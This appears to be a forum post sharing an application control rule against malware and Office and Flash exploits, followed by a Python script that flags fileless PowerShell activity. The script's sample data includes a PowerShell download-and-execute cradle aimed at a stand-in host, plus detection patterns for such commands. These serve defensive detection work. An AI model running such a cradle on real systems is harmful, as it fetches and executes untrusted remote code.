This is version no.1 (will be updated in the future)
I have exported a sanitized (from my organization's data) application control rule which covers most of the malware and ATP detection and protection that I have learned and used.
Tested in a large (5000+ endpoint) environment on endpoints and servers.
******** You should use this rule as TEST (LOG ONLY) at first - it is important to make all the necessary exceptions for your organization ********
After you get rid of the false positives you have two options:
1) make it production
2) make all sub-rules "continue with logging" and start changing the rules to "block" with time
Hope it helps you all!!
______________________________________________________________________________________________
Updated the rules - version 2
The big tunes and updates:
OFFICE malicious behaviour protection - covers the recent attack that used CVE-2017-11882 (Office), CVE-2018-4878 (Flash)
Internet Browsers malicious behaviour protection - covers the recent attack that used CVE-2018-4878 (Flash)
Fileless PowerShell malicious behaviour protection - covers script file or string download
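As an added illustration of what the "fileless PowerShell" sub-rule is looking for (this is editor-written example code, not the exported rule and not part of the original post), the script below runs simple indicator matching over constructed process command lines. The indicator regexes, the `remote_download` / `invoke_expression` / `encoded_command` / `evasion_switches` names and the severity scheme are my assumptions about what "script file or string download" covers; the sample events and hostnames are made up. The "medium" tier is where legitimate admin scripts land, which is the kind of hit you would be tuning exceptions for while the rule is still in log-only mode.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events (hypothetical; not from the original post
# or any real environment). Each tuple is (hostname, command line).
SAMPLE_EVENTS = [
    ("WS-0142", 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"'),
    ("WS-0142", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    ("SRV-DB01", "powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ("WS-0077", "powershell.exe Get-ChildItem C:\\Temp"),
]

# Indicator name -> regex (assumed indicator set; case-insensitive because PowerShell is).
INDICATORS = {
    # Fetching a script file or a string of script text from the network.
    "remote_download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer|invoke-restmethod",
        re.I),
    # Executing text as code, the usual second half of a download cradle.
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    # Base64-encoded command line: -e / -ec / -enc / -encodedcommand followed by a base64 blob.
    "encoded_command": re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    # Evasion switches: execution-policy bypass, hidden window, no profile.
    "evasion_switches": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile", re.I),
}


@dataclass
class Finding:
    host: str
    cmdline: str
    indicators: list = field(default_factory=list)
    severity: str = "none"


def classify(cmdline: str) -> list:
    """Return the names of all indicators present in one command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def severity_for(indicators) -> str:
    """
    high:   network fetch combined with execution or encoding (a download cradle);
    medium: any single indicator, which is where legitimate admin scripts show up
            and where exceptions get tuned in log-only mode;
    none:   nothing matched.
    """
    s = set(indicators)
    if "remote_download" in s and ({"invoke_expression", "encoded_command"} & s):
        return "high"
    if s:
        return "medium"
    return "none"


def scan(events) -> list:
    """Scan (host, cmdline) pairs and return only the events with at least one indicator."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append(Finding(host, cmdline, hits, severity_for(hits)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.host}: {', '.join(f.indicators)}")
        print(f"         {f.cmdline}")
```

On the constructed sample the first event is the only "high" (download plus in-memory execution), the `-ExecutionPolicy Bypass -File backup.ps1` line is a typical "medium" that a scheduled admin task would produce, and the plain `Get-ChildItem` line produces nothing. Run it against a day of process-creation logs from your own environment in the same spirit as the log-only phase: the medium hits tell you which exceptions to add before switching anything to block.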